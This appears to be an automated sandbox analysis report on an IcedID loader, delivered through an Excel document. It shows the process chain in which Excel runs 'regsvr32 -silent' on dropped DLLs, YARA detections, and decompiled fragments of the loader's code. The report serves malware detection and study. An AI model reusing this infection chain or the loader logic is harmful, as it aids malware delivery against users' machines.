                                                                                                                                                                                                          CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034
                                                                                                                                                                                                          Jul 6, 2021 15:47:28.418191910 CEST13.225.75.73443192.168.2.2249172CN=aws.amazon.com CN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Amazon, OU=Server CA 1B, O=Amazon, C=US CN=Amazon Root CA 1, O=Amazon, C=US CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 30 02:00:00 CEST 2020 Thu Oct 22 02:00:00 CEST 2015 Mon May 25 14:00:00 CEST 2015 Wed Sep 02 02:00:00 CEST 2009Thu Sep 23 14:00:00 CEST 2021 Sun Oct 19 02:00:00 CEST 2025 Thu Dec 31 02:00:00 CET 2037 Wed Jun 28 19:39:16 CEST 2034769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,005af1f5ca1b87cc9cc9b25185115607d
                                                                                                                                                                                                          CN=Amazon, OU=Server CA 1B, O=Amazon, C=USCN=Amazon Root CA 1, O=Amazon, C=USThu Oct 22 02:00:00 CEST 2015Sun Oct 19 02:00:00 CEST 2025
                                                                                                                                                                                                          CN=Amazon Root CA 1, O=Amazon, C=USCN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USMon May 25 14:00:00 CEST 2015Thu Dec 31 02:00:00 CET 2037
                                                                                                                                                                                                          CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=USOU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=USWed Sep 02 02:00:00 CEST 2009Wed Jun 28 19:39:16 CEST 2034

                                                                                                                                                                                                          Code Manipulations

                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                          Analysis Process: EXCEL.EXE PID: 2624 Parent PID: 584

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:15:47:35
                                                                                                                                                                                                          Start date:06/07/2021
                                                                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                          Imagebase:0x13f210000
                                                                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Chronological Activities

                                                                                                                                                                                                          Analysis Process: regsvr32.exe PID: 3028 Parent PID: 2624

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:15:47:37
                                                                                                                                                                                                          Start date:06/07/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                          Imagebase:0xff670000
                                                                                                                                                                                                          File size:19456 bytes
                                                                                                                                                                                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000003.00000002.2087735512.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                          • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Chronological Activities

                                                                                                                                                                                                          Analysis Process: regsvr32.exe PID: 3036 Parent PID: 2624

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:15:47:41
                                                                                                                                                                                                          Start date:06/07/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                          Imagebase:0xff670000
                                                                                                                                                                                                          File size:19456 bytes
                                                                                                                                                                                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2094984722.0000000000110000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                          • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Chronological Activities

                                                                                                                                                                                                          Analysis Process: regsvr32.exe PID: 1916 Parent PID: 2624

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:15:47:44
                                                                                                                                                                                                          Start date:06/07/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                          Imagebase:0xff670000
                                                                                                                                                                                                          File size:19456 bytes
                                                                                                                                                                                                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000005.00000002.2102346921.00000000000B0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                          • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000005.00000002.2102480631.0000000000333000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                          Reputation:high

                                                                                                                                                                                                          Chronological Activities

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                            Analysis Process: regsvr32.exe PID: 3028 Parent PID: 2624 regsvr32.exeCOMMON

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 003127BC, Relevance: 3.1, APIs: 2, Instructions: 87COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 25%
                                                                                                                                                                                                            			E003127BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* __rdi;
				int _t23;
				void* _t24;
				void* _t27;
				intOrPtr _t35;
				void* _t36;
				intOrPtr* _t44;
				long long _t46;
				intOrPtr* _t48;
				intOrPtr* _t54;
				intOrPtr* _t62;
				signed long long _t64;
				long long* _t67;
				intOrPtr* _t69;
				void* _t77;
				void* _t78;
				struct HINSTANCE__* _t79;
				void* _t80;
				CHAR* _t82;
				char* _t83;

				_t64 = __rsi;
				_t46 = __rbx;
				_t44 = _t69;
				 *((long long*)(_t44 + 8)) = __rbx;
				 *((long long*)(_t44 + 0x18)) = __rbp;
				 *((long long*)(_t44 + 0x20)) = __rsi;
				_push(_t62);
				_t80 = __rcx;
				_t83 = L"; _gid=";
				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
				LoadLibraryA(_t82);
				GetProcAddress(_t79);
				_t67 = _t44;
				if(_t44 == 0) {
					L6:
					r9d = 1;
					_t23 = E00312990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x3170c4, _t77, _t78);
					L7:
					return _t23;
				}
				_t24 =  *_t67(); // executed
				if(_t24 == 0x6f && __rbx != 0) {
					GetProcessHeap();
					_t9 = _t64 + 8; // 0x8
					_t36 = _t9;
					HeapAlloc(??, ??, ??);
					_t62 = _t44;
					if(_t44 == 0) {
						goto L6;
					}
					_t54 = _t44; // executed
					_t27 =  *_t67(); // executed
					if(_t27 == 0) {
						_t48 = _t62;
						do {
							if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
								_t35 =  *((intOrPtr*)(_t48 + 0x194));
								if(_t54 - 1 <= 7) {
									r9d = _t35;
									_t18 = _t48 + 0x198; // 0x198
									_t54 = _t80 + _t64 * 2;
									E00312990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
									_t64 = _t64 + _t44;
									_t83 = ":";
								}
							}
							_t48 =  *_t48;
						} while (_t48 != 0);
						GetProcessHeap();
						_t36 = 0;
						_t23 = HeapFree(??, ??, ??);
						if(_t64 == 0) {
							goto L6;
						}
						goto L7;
					}
					GetProcessHeap();
					_t36 = 0;
					HeapFree(??, ??, ??);
				}
			}























                                                                                                                                                                                                            0x003127bc
                                                                                                                                                                                                            0x003127bc
                                                                                                                                                                                                            0x003127bc
                                                                                                                                                                                                            0x003127bf
                                                                                                                                                                                                            0x003127c3
                                                                                                                                                                                                            0x003127c7
                                                                                                                                                                                                            0x003127cb
                                                                                                                                                                                                            0x003127d4
                                                                                                                                                                                                            0x003127d7
                                                                                                                                                                                                            0x003127e7
                                                                                                                                                                                                            0x003127ea
                                                                                                                                                                                                            0x003127fa
                                                                                                                                                                                                            0x00312800
                                                                                                                                                                                                            0x00312806
                                                                                                                                                                                                            0x0031285f
                                                                                                                                                                                                            0x0031285f
                                                                                                                                                                                                            0x00312876
                                                                                                                                                                                                            0x0031287b
                                                                                                                                                                                                            0x00312893
                                                                                                                                                                                                            0x00312893
                                                                                                                                                                                                            0x0031280f
                                                                                                                                                                                                            0x00312814
                                                                                                                                                                                                            0x0031281f
                                                                                                                                                                                                            0x0031282c
                                                                                                                                                                                                            0x0031282c
                                                                                                                                                                                                            0x0031282f
                                                                                                                                                                                                            0x00312835
                                                                                                                                                                                                            0x0031283b
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00312842
                                                                                                                                                                                                            0x00312845
                                                                                                                                                                                                            0x00312849
                                                                                                                                                                                                            0x00312894
                                                                                                                                                                                                            0x00312897
                                                                                                                                                                                                            0x0031289e
                                                                                                                                                                                                            0x003128a9
                                                                                                                                                                                                            0x003128b5
                                                                                                                                                                                                            0x003128b7
                                                                                                                                                                                                            0x003128ba
                                                                                                                                                                                                            0x003128c1
                                                                                                                                                                                                            0x003128c8
                                                                                                                                                                                                            0x003128cd
                                                                                                                                                                                                            0x003128d0
                                                                                                                                                                                                            0x003128d0
                                                                                                                                                                                                            0x003128b5
                                                                                                                                                                                                            0x003128d7
                                                                                                                                                                                                            0x003128da
                                                                                                                                                                                                            0x003128df
                                                                                                                                                                                                            0x003128e8
                                                                                                                                                                                                            0x003128ed
                                                                                                                                                                                                            0x003128f6
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x003128fc
                                                                                                                                                                                                            0x0031284b
                                                                                                                                                                                                            0x00312854
                                                                                                                                                                                                            0x00312859
                                                                                                                                                                                                            0x00312859

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00312CFE,?,?,00000003,003124A4), ref: 0031280F
                                                                                                                                                                                                            • GetAdaptersInfo.IPHLPAPI(?,?,00000000,00312CFE,?,?,00000003,003124A4), ref: 00312845
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AdaptersInfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3177971545-0
                                                                                                                                                                                                            • Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                            • Instruction ID: 9219f82e057c2f6c188820d4551277750c7bd6afbeddadac8b68ea0d9306291a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3318B76605B8096EB1ADB66E8007DAB764FB4DF94F494025CF0D0B718EF38C699C300
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00311810, Relevance: 1.7, APIs: 1, Instructions: 198memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                            • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                            • Instruction ID: 8039e717df423dcfb2cdb2c1097e64be209abc9e64a418051bdd6bda65102b79
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E719D72301B8197EB2ACF66E850BD93BA5FB4DB94F0981259F4943B14DF38C695C700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 003122DC, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LookupAccountNameW.ADVAPI32 ref: 0031233C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AccountLookupName
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1484870144-0
                                                                                                                                                                                                            • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                            • Instruction ID: ba67d5b3ffcd754f74f437990838a7355b0a424669c04951dd2540826055d1e4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A317E72701B418AEB168FB6E8443DE73A4EB4DB88F594135DA4D57B18EF38C659C340
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00311678, Relevance: 1.6, APIs: 1, Instructions: 77nativeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • NtQuerySystemInformation.NTDLL(?,?,00000000,00312CB1,?,?,00000003,003124A4), ref: 003116CB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: InformationQuerySystem
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3562636166-0
                                                                                                                                                                                                            • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                            • Instruction ID: dfe3cbf9a2b42352344c9922ffbd2f0eea1f4f60939fe4946b6f39e24f85bfa3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05215E76315B4083EB1BDB52A8443E9A2A9BB8DBD1F194034DF4A47794EF3CCA858700
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 00312434, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                            			E00312434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E003111FC(_t73 - 0x29, _t52);
					_t37 = E0031153C(_t73 - 0x29);
					E00312C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E00311EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0031272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E00311FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E00312A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312434
                                                                                                                                                                                                            0x00312439
                                                                                                                                                                                                            0x0031243f
                                                                                                                                                                                                            0x0031244d
                                                                                                                                                                                                            0x0031244d
                                                                                                                                                                                                            0x0031244d
                                                                                                                                                                                                            0x00312512
                                                                                                                                                                                                            0x00312528
                                                                                                                                                                                                            0x00312450
                                                                                                                                                                                                            0x00312454
                                                                                                                                                                                                            0x00312456
                                                                                                                                                                                                            0x0031245a
                                                                                                                                                                                                            0x00312460
                                                                                                                                                                                                            0x00312468
                                                                                                                                                                                                            0x0031246e
                                                                                                                                                                                                            0x00312472
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x00312474
                                                                                                                                                                                                            0x00312482
                                                                                                                                                                                                            0x0031248c
                                                                                                                                                                                                            0x0031249d
                                                                                                                                                                                                            0x0031249f
                                                                                                                                                                                                            0x003124a4
                                                                                                                                                                                                            0x003124a7
                                                                                                                                                                                                            0x003124b0
                                                                                                                                                                                                            0x003124bf
                                                                                                                                                                                                            0x003124c1
                                                                                                                                                                                                            0x003124cc
                                                                                                                                                                                                            0x003124d2
                                                                                                                                                                                                            0x003124d7
                                                                                                                                                                                                            0x003124db
                                                                                                                                                                                                            0x003124e0
                                                                                                                                                                                                            0x003124e2
                                                                                                                                                                                                            0x003124f0
                                                                                                                                                                                                            0x003124f0
                                                                                                                                                                                                            0x003124fc
                                                                                                                                                                                                            0x00312501
                                                                                                                                                                                                            0x00312504
                                                                                                                                                                                                            0x0031250d
                                                                                                                                                                                                            0x0031250d
                                                                                                                                                                                                            0x00312504
                                                                                                                                                                                                            0x003124cc
                                                                                                                                                                                                            0x003124bf
                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                            0x003124a7

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                            • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                            • Instruction ID: 5f51b09dfd7cdb685be31d71cbd917b3c606d010e457662d4a700eb71857db55
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3C21B372300A409ADF1ADFB1D4503DE6366F74C784F494426DF4D57649EE38D699C350
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2090905124.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090900152.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090931253.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090940305.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090957028.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                            • API String ID: 4275171209-1517691801
                                                                                                                                                                                                            • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                            • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2090905124.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090900152.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090931253.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090940305.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090957028.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                            • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                            • API String ID: 1174013218-1650116920
                                                                                                                                                                                                            • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                            • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2090905124.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090900152.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090931253.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090940305.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            • Associated: 00000003.00000002.2090957028.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                            • API String ID: 4275171209-2766056989
                                                                                                                                                                                                            • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                            • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 003110AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.2087836681.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExitProcessSleepUser
                                                                                                                                                                                                            • String ID:
